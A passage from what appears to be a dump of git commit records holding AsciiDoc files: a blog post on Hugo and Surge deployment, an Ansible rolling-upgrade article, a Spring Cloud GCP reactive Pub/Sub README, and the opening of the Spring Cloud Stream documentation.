Portuguese]. I have decided to write all my front end development and design notes in Portuguese, for the practice. \n\n=== Update: Surge and My Urge to Merge\n\nimage::surgetogringolalia.png[Urge to Surge]\n\nOkay, the second time through the list of third-party deploy options I discover that http:\/\/griongolalia.surge.sh[Surge] is the answer to my need to post sites to URLs that I can show to clients. \n\nSurge totally rocks. `npm install --global surge` and then just plain `surge` in your project directory. \n\nPrompts you for the folder to push and the subdomain and **bazunga**!\n\nWhat is their business model, I wonder?\n\nBut this solution does not let me clone and push from a clone repo another computer, like the one in the https:\/\/en.wikipedia.org\/wiki\/Cancer_Ward[Cancer Ward] (\u0420\u0430\u043a\u043e\u0432\u044b\u0439 \u041a\u043e\u0440\u043f\u0443\u0441). So I cannot push things like theme changes with version control. Handy to be able to check out your homework during your rehab down time, even if the Window XP machine -- you heard right -- is agonizingly slow.\n\nhttp:\/\/prose.io\/#bretonio[Prose.io] is one way to work from remote locations: Brazilian LAN houses or a laptop in a caf\u00e9 or a chic *padaria* with WiFi or such like. But then you get those problems when you `git pull`. I really need to study `git` more systematically. \n\nIs there any online courseware on this subject? \n\nhttps:\/\/github.com\/github\/training-kit[Of course there is]! \n\nForking to https:\/\/github.com\/bretonio[bretonio] ...\n\nI audited https:\/\/www.coursetalk.com\/providers\/coursera\/courses\/social-network-analysis[a great Coursera course] last year on social network analysis and visualization with https:\/\/gephi.org\/[Gephi]. \n\nI was running my own crawls using http:\/\/www.cwr.cl\/projects\/WIRE\/doc\/[WIRE], https:\/\/tupiwire.wordpress.com\/2014\/05\/01\/spidermen-wire-pajek\/[churning the data in Pajek], and visualizing the results. \n\nA big waste of my potentially productive -- money-earning --time, but I enjoyed it a lot. One of these days I will look into link analysis with http:\/\/wiki.apache.org\/nutch\/NewScoring[Nutch], but for the time being I am busy enough with rehab, writing and studying the fabrication of sites. ","old_contents":"= Hugo: No Go (Felicitous Update)\n:hp-tags: front-end, github, hugo, static site generator, hosting, push, workflow, automation, themes, deployment\n\nMy Hugo experience has been really frustrating. I guess https:\/\/discuss.gohugo.io\/t\/i-am-really-confused-as-to-how-to-deploy-hugo-with-github\/3669\/7[I am not the only one].\n\n>>You can skip all the whining and scroll down to where Surge turns out to be a very satisfactory partial solution. --Editor\n\nWith Hugo, I am able to build and serve locally all manner of remarkable sites with ease. It rocks. It rolls.\n\nBut I just cannot seem to deploy these sites, to GitHub Pages or anywhere else.\n\nI have followed http:\/\/codethejason.github.io\/blog\/setupghpages\/[these instructions], and variants for deploying to a personal or org page.\n\nI have tested Netflify and Surge and am testing https:\/\/gohugo.io\/tutorials\/automated-deployments\/[Wercker] and https:\/\/travis-ci.org\/gringolalia\/gringolalia[Travis] and others. I am making a list. I am checking it twice. \n\nI have checked out a couple of https:\/\/github.com\/spencerlyon2\/hugo_gh_blog\/blob\/master\/deploy.sh[deploy scripts] as well, including http:\/\/heiber.im\/post\/switching-to-hugo\/[this one] for deploying to personal or org pages rather than project pages.\n\nimage::netlifyfailurescale.png[]\n\n=== Google Search & Deploy\n\nIn the case of Netflify and http:\/\/harmonious-advertisement.surge.sh\/[Surge], the deploy succeeds, but the theme is missing. Just raw HTML, though \tthere are folders and files for CCS, JS and SASS. \n\nWhen I build the site with `hugo --theme=ghostwriter` and upload it to my local Web server, same problem. \n\nI should not need to specify the stylesheet as it is in my `config.toml`\n\nStylesheets and other elements of style are present in the deployed `public\/` folder but the theme does not load. \n\nA fellow sufferer suggests removing the `.git` folder from the `themes\/ghostwriter` folder.\n\nTo no effect. I follow the Netflify tutorial and get the `no configuration file found` error.\t\n\n> 12:27:23 PM: Error running command: Build script returned non-zero exit code: 255\n\nI copy the `gringolalia` folder into one called `glossalia`, remove the `.git` folder, create a new project with that name on gringolalia@github and repeat `git init` and all that stuff.\n\nI really have to stop floundering and draw up a plan of attack. Hugo is a great tool with a wealth of themes to adapt and study, but I need to have time to actually write in https:\/\/brasilianas.github.io\/[these writing spaces I keep setting up for myself]. \n\nGhostwriter in Hugo is not *so* fantastic that I just have to have it in my portfolio. But I do like it.\n\nI want to write criticism and essays in the genre of Camus and a cheap spy novel about money laundering and Uruguay and Paraguay. I have https:\/\/brasilianas.github.io\/[a thing about Paraguay], this is true. I explain it https:\/\/gringolalia.surge.sh\/2016\/09\/07\/porque-sambodia\/[here, in Portuguese]. I have decided to write all my front end development and design notes in Portuguese, for the practice. \n\n=== Update: Surge and My Urge to Merge\n\nimage::surgetogringolalia.png[Urge to Surge]\n\nOkay, the second time through the list of third-party deploy options I discover that http:\/\/griongolalia.surge.sh[Surge] is the answer to my need to post sites to URLs that I can show to clients. \n\nSurge totally rocks. `npm install --global surge` and then just plain `surge` in your project directory. \n\nPrompts you for the folder to push and the subdomain and **bazunga**!\n\nWhat is their business model, I wonder?\n\nBut this solution does not let me clone and push from a clone repo another computer, like the one in the https:\/\/en.wikipedia.org\/wiki\/Cancer_Ward[Cancer Ward] (\u0420\u0430\u043a\u043e\u0432\u044b\u0439 \u041a\u043e\u0440\u043f\u0443\u0441). So I cannot push things like theme changes with version control. Handy to be able to check out your homework during your rehab down time, even if the Window XP machine -- you heard right -- is agonizingly slow.\n\nhttp:\/\/prose.io\/#bretonio[Prose.io] is one way to work from remote locations: Brazilian LAN houses or a laptop in a caf\u00e9 or a chic *padaria* with WiFi or such like. But then you get those problems when you `git pull`. I really need to study `git` more systematically. \n\nIs there any online courseware on this subject? \n\nhttps:\/\/github.com\/github\/training-kit[Of course there is]! \n\nForking to https:\/\/github.com\/bretonio[bretonio] ...\n\nI audited https:\/\/www.coursetalk.com\/providers\/coursera\/courses\/social-network-analysis[a great Coursera course] last year on social network analysis and visualization with https:\/\/gephi.org\/[Gephi]. \n\nI was running my own crawls using http:\/\/www.cwr.cl\/projects\/WIRE\/doc\/[WIRE], https:\/\/tupiwire.wordpress.com\/2014\/05\/01\/spidermen-wire-pajek\/[churning the data in Pajek], and visualizing the results. \n\nA big waste of my potentially productive -- money-earning --time, but I enjoyed it a lot. One of these days I will look into link analysis with http:\/\/wiki.apache.org\/nutch\/NewScoring[Nutch], but for the time being I am busy enough with rehab, writing and studying the fabrication of sites. ","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8ad3500d38ccef1b40e8884357fa8b482c84d647","subject":"Work Ansible and rolling","message":"Work Ansible and rolling\n","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-07-05-Ansible-and-rolling-upgrades.adoc","new_file":"_posts\/2017-07-05-Ansible-and-rolling-upgrades.adoc","new_contents":"= Ansible and rolling upgrades\n\n:hp-tags: ansible, elasticsearch, kafka, cassandra\n:hp-image: \/images\/logos\/ansible.png\n:source_dir: ..\/sources\/2017-07-05-Ansible-and-rolling-upgrades\n:image_dir: 2017-07-05-Ansible-and-rolling-upgrades\n:published_at: 2017-01-15\n\nAnsible is a nice tool to deploy distributed systems like Elasticsearch, Kafka, Cassandra and the like.\nThese distributed systems are built to avoid downtime and allow partial failures.\nUpgrading these softwares, or updating their configuration, requires restarting each member of the cluster.\n\nThe aim of the this article is to describe an Ansible pattern I discovered\ntrying to improve deployment speed\nand yet being able to guarantee availability during the upgrade process.\nTo improve deployment, you need to deploy all hosts in parallel.\nTo guarantee availability, you can't stop all host at the same time: you must deploy each host one after the other.\n\n== The problem\n\nLet's take the Elasticsearch example.\n\nThe tasks required to deploy Elasticsearch on each host of the cluster are gathered in an `elasticsearch` role.\nThen this role is applied to all hosts belonging to the `elasticsearch` group in the Ansible playbook.\n\n.playbook.yml\n[source,yaml]\n----\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n----\n\nAt some point, the `elasticsearch` role probably contains something to stop Elasticsearch in order to apply changes:\n\n.roles\/elasticsearch\/tasks\/main.yml\n[source,yaml]\n----\n...\n- name: Stop service\n become: true\n service:\n name: elasticsearch\n state: stopped\n enabled: true\n...\n----\nIf we do that, all Elasticsearch nodes will be stopped at the same time, making the whole cluster unavailable.\nTo fix this problem, the role can be ran in serial instead of parallel:\n\n.deploy.yml\n[source,yaml]\n----\n- hosts: es\n serial: 1 # Force serial execution\n roles:\n - role: elasticsearch\n----\nBut deploying every host in serial takes a very long time and makes deployment endless.\n\n== Refactoring the role\n\nThe main idea is to split the role into multiple steps, and do as much as possible in parallel:\n\n1. *In Parallel*: Deploy system settings, software settings, software binaries.\n But don't stop anything and don't remove anything.\n2. *In Serial*:\n * Stop the node\n * Install or upgrade the node as quickly as possible\n * Start the node\n3. *In Parallel*: finish applying settings on running cluster and remove old files and binaries.\n\nThen descibe each step in its own YAML file: `before.yml`, `stop_start.yml` and `after.yml`.\nFinally, the role entry point `main.yml` will include the appropriate step using a variable named `elasticsearch_step`:\n\n.roles\/elasticsearch\/tasks\/main.yml\n[source,yaml]\n----\n- name: \"Running step {{ elasticsearch_step }}\"\n include: \"{{ elasticsearch_step }}.yml\"\n----\n\nWe can also create a fake step including all the steps (more on that later):\n\n.roles\/elasticsearch\/tasks\/all.yml\n[source,yaml]\n----\n- include: \"before.yml\"\n- include: \"stop_start.yml\"\n- include: \"after.yml\"\n----\n\n== Refactoring the playbook\n\nNow in the playbook we will call the role 3 times, each individual step being called independently.\n\n.playbook.yml\n[source,yaml]\n----\n# In parallel\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"before\"\n\n# In serial\n- hosts: elasticsearch\n any_errors_fatal: true\n serial: 1\n roles:\n - role: elasticsearch\n elasticsearch_step: \"stop_start\"\n\n# In parallel\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"after\"\n----\n\nTo install a brand new cluster, there is nothing to stop, and we don't fear anything.\nIn this particular case, this role can still be used, and the `stop_start` step can be called in parallel:\n\n.playbook.yml\n[source,yaml]\n----\n# New cluster\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"before\"\n - role: elasticsearch\n elasticsearch_step: \"stop_start\"\n - role: elasticsearch\n elasticsearch_step: \"after\"\n----\n\nOr even simpler, we can use `all` step:\n\n.playbook.yml\n[source,yaml]\n----\n# New cluster\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"all\"\n----\n\n== Hot configuration\n\nMost of the time, I am running my Ansible playbook only to change settings that don't need nodes to be restarted.\nThe trick is here to detect in the `before` step whether nodes should be restarted or not:\nVersion upgrade? Configuration that can not be hot reloaded?\nOn lucky days, you can skip the expensive `stop_start` step and have a quick deploy.\n","old_contents":"= Ansible and rolling upgrades\n\n:hp-tags: ansible, elasticsearch, kafka, cassandra\n:hp-image: \/images\/logos\/ansible.png\n:source_dir: ..\/sources\/2017-07-05-Ansible-and-rolling-upgrades\n:image_dir: 2017-07-05-Ansible-and-rolling-upgrades\n:published_at: 2017-01-15\n\nAnsible is a nice tool to deploy software associated configuration for distributed systems like Elasticsearch, Kafka, Cassandra and the like.\nThese distributed systems are built to avoid downtime and allow partial failures.\nUpgrading these softwares or updating their configuration requires restarting each member of the cluster.\n\nThe aim of the this article is to explain an Ansible pattern I discovered deploying trying to improve deployment speed\nand yet being able to guarantee availability during the upgrade process.\nTo improve deployment, you need to deploy all hosts in parallel.\nTo guarantee availability, you can't stop all host at the same: you must deploy each host one after the other.\n\n== The problem\n\nLet's take the Elasticsearch example.\nThe tasks required to deploy Elasticsearch on each host of the cluster are gather in an `elasticsearch` role.\nThen this role is applied to all hosts belonging to the `elasticsearch` group in the Ansible playbook.\n\n.playbook.yml\n[source,yaml]\n----\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n----\n\nThe `elasticsearch` role probably contains something to stop Elasticsearch in order to apply changes:\n\n.roles\/elasticsearch\/tasks\/main.yml\n[source,yaml]\n----\n...\n- name: Stop service\n become: true\n service:\n name: elasticsearch\n state: stopped\n enabled: true\n...\n----\nIf we do that, all Elasticsearch nodes will be stopped at the same time and users will cry all their tears.\nTo fix this problem, the role can be ran in serial instead of parallel:\n\n.deploy.yml\n[source,yaml]\n----\n- hosts: es\n serial: 1 # Force serial execution\n roles:\n - role: elasticsearch\n----\nBut deploying every host in serial makes deployment endless.\n\n== Refactoring the role\n\nThe main idea is to split the role into multiple steps:\n\n1. *In Parrallel*: deploy as much things as possible: system settings, software settings, software binaries.\n But don't stop anything and don't remove anything.\n2. *In Serial*:\n * Stop the node\n * Install or upgrade the node as quickly as possible\n * Start the node\n3. *In Parallel*: finish applying settings on running cluster and remove old files and binaries.\n\nEach step is described in its own YAML file: `before.yml`, `stop_start.yml` and `after.yml`.\nThe role entry point routes to the appropriate step using role variable named `elasticsearch_step`:\n\n.roles\/elasticsearch\/tasks\/main.yml\n[source,yaml]\n----\n - name: \"Running step {{ elasticsearch_step }}\"\n include: \"{{ elasticsearch_step }}.yml\"\n----\n\n== Refactoring the playbook\n\nNow in the playbook we will call the role 3 times, each step being called independently.\n\n.playbook.yml\n[source,yaml]\n----\n# In parallel\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"before\"\n\n# In serial\n- hosts: elasticsearch\n any_errors_fatal: true\n serial: 1\n roles:\n - role: elasticsearch\n elasticsearch_step: \"stop_start\"\n\n# In parallel\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"after\"\n----\n\nTo install a brand new cluster, there is nothing to stop, and we don't fear anything.\nThis role can still be used, and the `stop_start` step can be called in parallel:\n\n.playbook.yml\n[source,yaml]\n----\n# New cluster\n- hosts: elasticsearch\n any_errors_fatal: true\n roles:\n - role: elasticsearch\n elasticsearch_step: \"before\"\n - role: elasticsearch\n elasticsearch_step: \"stop_start\"\n - role: elasticsearch\n elasticsearch_step: \"after\"\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"915aab4c764b4f2a50362e74ea14fec622c3e794","subject":"Update README.adoc (#1189)","message":"Update README.adoc (#1189)\n\nchange the get messages mapping","repos":"GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample\/README.adoc","new_file":"spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample\/README.adoc","new_contents":"= Google Cloud Reactive Pub\/Sub Code Sample\n\nThis code sample demonstrates consuming data from a GCP Cloud Pub\/Sub subscription as a reactive stream.\n\nAcquiring and processing the reactive stream is done in link:src\/main\/java\/com\/example\/ReactiveController.java\/[ReactiveController.java].\nEach message in the stream is acknowledged with `doOnNext()` operator.\nThen the `map()` operator converts the message's payload into a proper `String` and returns it to the subscriber:\n\n[source,java]\n----\nreturn flux\n .doOnNext(message -> {\n System.out.println(\"Received a message: \" + message.getPubsubMessage().getMessageId());\n message.ack();\n })\n .map(message -> new String(\n\t message.getPubsubMessage().getData().toByteArray(), Charset.defaultCharset()));\n----\n\nThe other two classes (link:src\/main\/java\/com\/example\/ReactiveReceiverApplication.java\/[ReactiveReceiverApplication.java] and link:src\/main\/java\/com\/example\/MessageSenderController.java\/[MessageSenderController.java]) boostrap the application and simplify publishing test data to a topic.\n\n== Setup & Configuration\n\nimage:http:\/\/gstatic.com\/cloudssh\/images\/open-btn.svg[link=https:\/\/ssh.cloud.google.com\/cloudshell\/editor?cloudshell_git_repo=https%3A%2F%2Fgithub.com%2FGoogleCloudPlatform%2Fspring-cloud-gcp&cloudshell_open_in_editor=spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample\/README.adoc]\n\n1. Configure your GCP project ID and credentials by following link:..\/..\/docs\/src\/main\/asciidoc\/core.adoc#project-id[these instructions].\n+\nAlternatively, if you have the https:\/\/cloud.google.com\/sdk\/[Google Cloud SDK] installed and initialized, and are logged in with https:\/\/developers.google.com\/identity\/protocols\/application-default-credentials[application default credentials], Spring will auto-discover those parameters for you.\n\n2. Go to the https:\/\/console.cloud.google.com\/cloudpubsub\/topicList[Google Cloud Console Pub\/Sub topics page] and create a topic called `exampleTopic`.\n\n3. Still in the same page, locate the newly created topic, click the button with the three vertical dots at the end of the topic's line and click \"New subscription\".\nCreate a new subscription called `exampleSubscription` with all default parameters.\n\n4. Run `$ mvn clean install` from the root directory of the project.\n\n5. In a terminal window, move into this directory (`spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample`) and run:\n\n mvn spring-boot:run\n\n6. In a browser, open http:\/\/localhost:8080, or use the `Web Preview` button in Cloud Shell to preview the app on\nport 8080, and send some (`N`) messages to the GCP Pub\/Sub topic.\nThe messages sent will all start with the message text provided, and end with a number from `0` to `N-1`.\nObserve that nothing is received by the sample application, since there are no subscribers yet.\n\n7. In another terminal, open a connection to `\/getMessages` streaming endpoint.\nThis stream will remain open until you stop it with `Ctrl+C`.\n\n curl localhost:8080\/getMessages\n\n8. Verify that the `curl` terminal received the messages, while the application itself logged their IDs.\n\n9. Publish some more messages from http:\/\/localhost:8080 or from Cloud Shell `Web Preview`;\nobserve that the additional data is streamed to the `curl` client.\n","old_contents":"= Google Cloud Reactive Pub\/Sub Code Sample\n\nThis code sample demonstrates consuming data from a GCP Cloud Pub\/Sub subscription as a reactive stream.\n\nAcquiring and processing the reactive stream is done in link:src\/main\/java\/com\/example\/ReactiveController.java\/[ReactiveController.java].\nEach message in the stream is acknowledged with `doOnNext()` operator.\nThen the `map()` operator converts the message's payload into a proper `String` and returns it to the subscriber:\n\n[source,java]\n----\nreturn flux\n .doOnNext(message -> {\n System.out.println(\"Received a message: \" + message.getPubsubMessage().getMessageId());\n message.ack();\n })\n .map(message -> new String(\n\t message.getPubsubMessage().getData().toByteArray(), Charset.defaultCharset()));\n----\n\nThe other two classes (link:src\/main\/java\/com\/example\/ReactiveReceiverApplication.java\/[ReactiveReceiverApplication.java] and link:src\/main\/java\/com\/example\/MessageSenderController.java\/[MessageSenderController.java]) boostrap the application and simplify publishing test data to a topic.\n\n== Setup & Configuration\n\nimage:http:\/\/gstatic.com\/cloudssh\/images\/open-btn.svg[link=https:\/\/ssh.cloud.google.com\/cloudshell\/editor?cloudshell_git_repo=https%3A%2F%2Fgithub.com%2FGoogleCloudPlatform%2Fspring-cloud-gcp&cloudshell_open_in_editor=spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample\/README.adoc]\n\n1. Configure your GCP project ID and credentials by following link:..\/..\/docs\/src\/main\/asciidoc\/core.adoc#project-id[these instructions].\n+\nAlternatively, if you have the https:\/\/cloud.google.com\/sdk\/[Google Cloud SDK] installed and initialized, and are logged in with https:\/\/developers.google.com\/identity\/protocols\/application-default-credentials[application default credentials], Spring will auto-discover those parameters for you.\n\n2. Go to the https:\/\/console.cloud.google.com\/cloudpubsub\/topicList[Google Cloud Console Pub\/Sub topics page] and create a topic called `exampleTopic`.\n\n3. Still in the same page, locate the newly created topic, click the button with the three vertical dots at the end of the topic's line and click \"New subscription\".\nCreate a new subscription called `exampleSubscription` with all default parameters.\n\n4. Run `$ mvn clean install` from the root directory of the project.\n\n5. In a terminal window, move into this directory (`spring-cloud-gcp-samples\/spring-cloud-gcp-pubsub-reactive-sample`) and run:\n\n mvn spring-boot:run\n\n6. In a browser, open http:\/\/localhost:8080, or use the `Web Preview` button in Cloud Shell to preview the app on\nport 8080, and send some (`N`) messages to the GCP Pub\/Sub topic.\nThe messages sent will all start with the message text provided, and end with a number from `0` to `N-1`.\nObserve that nothing is received by the sample application, since there are no subscribers yet.\n\n7. In another terminal, open a connection to `\/getmessages` streaming endpoint.\nThis stream will remain open until you stop it with `Ctrl+C`.\n\n curl localhost:8080\/getmessages\n\n8. Verify that the `curl` terminal received the messages, while the application itself logged their IDs.\n\n9. Publish some more messages from http:\/\/localhost:8080 or from Cloud Shell `Web Preview`;\nobserve that the additional data is streamed to the `curl` client.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de7d71255b0bc92b75821cb663b2967553dada26","subject":"Add doc for multiple destination names when binding consumer","message":"Add doc for multiple destination names when binding consumer\n","repos":"dsyer\/spring-cloud-stream,viniciusccarvalho\/spring-cloud-stream,dturanski\/spring-cloud-stream,viniciusccarvalho\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,dsyer\/spring-cloud-stream,markpollack\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,markfisher\/spring-cloud-stream,dturanski\/spring-cloud-stream,garyrussell\/spring-cloud-stream,mbogoevici\/spring-cloud-stream,ghillert\/spring-cloud-streams,ilayaperumalg\/spring-cloud-stream,viniciusccarvalho\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,dturanski\/spring-cloud-stream,garyrussell\/spring-cloud-stream,mbogoevici\/spring-cloud-stream,dsyer\/spring-cloud-stream,garyrussell\/spring-cloud-stream,markfisher\/spring-cloud-stream,markfisher\/spring-cloud-stream,markpollack\/spring-cloud-stream,markpollack\/spring-cloud-stream,mbogoevici\/spring-cloud-stream","old_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/spring-cloud-stream-overview.adoc","new_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/spring-cloud-stream-overview.adoc","new_contents":"[partintro]\n--\nThis section goes into more detail about how you can work with Spring Cloud Stream.\nIt covers topics such as creating and running stream applications.\n--\n\n== Introducing Spring Cloud Stream\nSpring Cloud Stream is a framework for building message-driven microservice applications.\nSpring Cloud Stream builds upon Spring Boot to create standalone, production-grade Spring applications, and uses Spring Integration to provide connectivity to message brokers.\nIt provides opinionated configuration of middleware from several vendors, introducing the concepts of persistent publish-subscribe semantics, consumer groups, and partitions.\n\nYou can add the `@EnableBinding` annotation to your application to get immediate connectivity to a message broker, and you can add `@StreamListener` to a method to cause it to receive events for stream processing.\nThe following is a simple sink application which receives external messages.\n\n[source,java]\n----\n@SpringBootApplication\npublic class StreamApplication {\n\n public static void main(String[] args) {\n SpringApplication.run(StreamApplication.class, args);\n }\n}\n\n@EnableBinding(Sink.class)\npublic class TimerSource {\n\n ...\n\n @StreamListener(Sink.INPUT)\n public void processVote(Vote vote) {\n votingService.recordVote(vote);\n }\n}\n----\n\nThe `@EnableBinding` annotation takes one or more interfaces as parameters (in this case, the parameter is a single `Sink` interface).\nAn interface declares input and\/or output channels.\nSpring Cloud Stream provides the interfaces `Source`, `Sink`, and `Processor`; you can also define your own interfaces.\n\nThe following is the definition of the `Source` interface:\n\n[source,java]\n----\npublic interface Sink {\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\nThe `@Input` annotation identifies an _input channel_, through which received messages enter the application; the `@Output` annotation identifies an _output channel_, through which published messages leave the application.\nThe `@Input` and `@Output` annotations can take a channel name as a parameter; if a name is not provided, the name of the annotated method will be used.\n\nSpring Cloud Stream will create an implementation of the interface for you.\nYou can use this in the application by autowiring it, as in the following example of a test case.\n\n[source,java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = StreamApplication.class)\n@WebAppConfiguration\n@DirtiesContext\npublic class StreamApplicationTests {\n\n @Autowired\n private Sink sink;\n\n @Test\n public void contextLoads() {\n assertNotNull(this.sink.input());\n }\n}\n----\n\n== Main Concepts\n\nSpring Cloud Stream provides a number of abstractions and primitives that simplify the writing of message-driven microservice applications.\nThis section gives an overview of the following:\n\n* Spring Cloud Stream's application model\n* The Binder abstraction\n* Persistent publish-subscribe support\n* Consumer group support\n* Partitioning support\n* A pluggable Binder API\n\n\n=== Application Model\n\nA Spring Cloud Stream application consists of a middleware-neutral core.\nThe application communicates with the outside world through input and output _channels_ injected into it by Spring Cloud Stream.\nChannels are connected to external brokers through middleware-specific Binder implementations.\n\n.Spring Cloud Stream Application\nimage::SCSt-with-binder.png[width=300,scaledwidth=\"50%\"]\n\n==== Fat JAR\n\nSpring Cloud Stream applications can be run in standalone mode from your IDE for testing.\nTo run a Spring Cloud Stream application in production, you can create an executable (or \"fat\") JAR by using the standard Spring Boot tooling provided for Maven or Gradle.\n\n=== The Binder Abstraction\n\nSpring Cloud Stream provides Binder implementations for https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/tree\/master\/spring-cloud-stream-binders\/spring-cloud-stream-binder-kafka[Kafka], https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/tree\/master\/spring-cloud-stream-binders\/spring-cloud-stream-binder-rabbit[Rabbit MQ], https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-redis[Redis], and https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-gemfire[Gemfire].\nSpring Cloud Stream also includes a https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/blob\/master\/spring-cloud-stream-test-support\/src\/main\/java\/org\/springframework\/cloud\/stream\/test\/binder\/TestSupportBinder.java[TestSupportBinder], which leaves a channel unmodified so that tests can interact with channels directly and reliably assert on what is received.\nYou can use the extensible API to write your own Binder.\n\nSpring Cloud Stream uses Spring Boot for configuration, and the Binder abstraction makes it possible for a Spring Cloud Stream application to be flexible in how it connects to middleware.\nFor example, deployers can dynamically choose, at runtime, the destinations (e.g., the Kafka topics or RabbitMQ exchanges) to which channels connect.\nSuch configuration can be provided through external configuration properties and in any form supported by Spring Boot (including application arguments, environment variables, and `application.yml` or `application.properties` files).\nIn the sink example from the <<_introducing_spring_cloud_stream>> section, setting the application property `spring.cloud.stream.bindings.input.destination` to `raw-sensor-data` will cause it to read from the `raw-sensor-data` Kafka topic, or from a queue bound to the `raw-sensor-data` RabbitMQ exchange.\n\nSpring Cloud Stream automatically detects and uses a binder found on the classpath.\nYou can easily use different types of middleware with the same code: just include a different binder at build time.\nFor more complex use cases, you can also package multiple binders with your application and have it choose the binder, and even whether to use different binders for different channels, at runtime.\n\n=== Persistent Publish-Subscribe Support\n\nCommunication between applications follows a publish-subscribe model, where data is broadcast through shared topics.\nThis can be seen in the following figure, which shows a typical deployment for a set of interacting Spring Cloud Stream applications.\n\n.Spring Cloud Stream Publish-Subscribe\nimage::SCSt-sensors.png[width=300,scaledwidth=\"50%\"]\n\nData reported by sensors to an HTTP endpoint is sent to a common destination named `raw-sensor-data`.\nFrom the destination, it is independently processed by a microservice application that computes time-windowed averages and by another microservice application that ingests the raw data into HDFS.\nIn order to process the data, both applications declare the topic as their input at runtime.\n\nThe publish-subscribe communication model reduces the complexity of both the producer and the consumer, and allows new applications to be added to the topology without disruption of the existing flow.\nFor example, downstream from the average-calculating application, you can add an application that calculates the highest temperature values for display and monitoring.\nYou can then add another application that interprets the same flow of averages for fault detection.\nDoing all communication through shared topics rather than point-to-point queues reduces coupling between microservices.\n\nWhile the concept of publish-subscribe messaging is not new, Spring Cloud Stream takes the extra step of making it an opinionated choice for its application model.\nBy using native middleware support, Spring Cloud Stream also simplifies use of the publish-subscribe model across different platforms.\n\n[[consumer-groups]]\n=== Consumer Groups\nWhile the publish-subscribe model makes it easy to connect applications through shared topics, the ability to scale up by creating multiple instances of a given application is equally important.\nWhen doing this, different instances of an application are placed in a competing consumer relationship, where only one of the instances is expected to handle a given message.\n\nSpring Cloud Stream models this behavior through the concept of a _consumer group_.\n(Spring Cloud Stream consumer groups are similar to and inspired by Kafka consumer groups.)\nEach consumer binding can use the `spring.cloud.stream.bindings.input.group` property to specify a group name.\nFor the consumers shown in the following figure, this property would be set as `spring.cloud.stream.bindings.input.group=hdfsWrite` or `spring.cloud.stream.bindings.input.group=average`.\n\n.Spring Cloud Stream Consumer Groups\nimage::SCSt-groups.png[width=300,scaledwidth=\"50%\"]\n\nAll groups which subscribe to a given destination receive a copy of published data, but only one member of each group receives a given message from that destination.\nBy default, when a group is not specified, Spring Cloud Stream assigns the application to an anonymous and independent single-member consumer group that is in a publish-subscribe relationship with all other consumer groups.\n\n[[durability]]\n==== Durability\n\nConsistent with the opinionated application model of Spring Cloud Stream, consumer group subscriptions are _durable_.\nThat is, a binder implementation ensures that group subscriptions are persistent, and once at least one subscription for a group has been created, the group will receive messages, even if they are sent while all applications in the group are stopped.\n\n[NOTE]\n====\nAnonymous subscriptions are non-durable by nature.\nFor some binder implementations (e.g., RabbitMQ), it is possible to have non-durable group subscriptions.\n====\n\nIn general, it is preferable to always specify a consumer group when binding an application to a given destination.\nWhen scaling up a Spring Cloud Stream application, you must specify a consumer group for each of its input bindings.\nThis prevents the application's instances from receiving duplicate messages (unless that behavior is desired, which is unusual).\n\n[[partitioning]]\n=== Partitioning Support\n\nSpring Cloud Stream provides support for _partitioning_ data between multiple instances of a given application.\nIn a partitioned scenario, the physical communication medium (e.g., the broker topic) is viewed as being structured into multiple partitions.\nOne or more producer application instances send data to multiple consumer application instances and ensure that data identified by common characteristics are processed by the same consumer instance.\n\nSpring Cloud Stream provides a common abstraction for implementing partitioned processing use cases in a uniform fashion.\nPartitioning can thus be used whether the broker itself is naturally partitioned (e.g., Kafka) or not (e.g., RabbitMQ).\n\n.Spring Cloud Stream Partitioning\nimage::SCSt-partitioning.png[width=300,scaledwidth=\"50%\"]\n\nPartitioning is a critical concept in stateful processing, where it is critiical, for either performance or consistency reasons, to ensure that all related data is processed together.\nFor example, in the time-windowed average calculation example, it is important that all measurements from any given sensor are processed by the same application instance.\n\n[NOTE]\n====\nTo set up a partitioned processing scenario, you must configure both the data-producing and the data-consuming ends.\n====\n\n== Programming Model\n\nThis section describes Spring Cloud Stream's programming model.\nSpring Cloud Stream provides a number of predefined annotations for declaring bound input and output channels 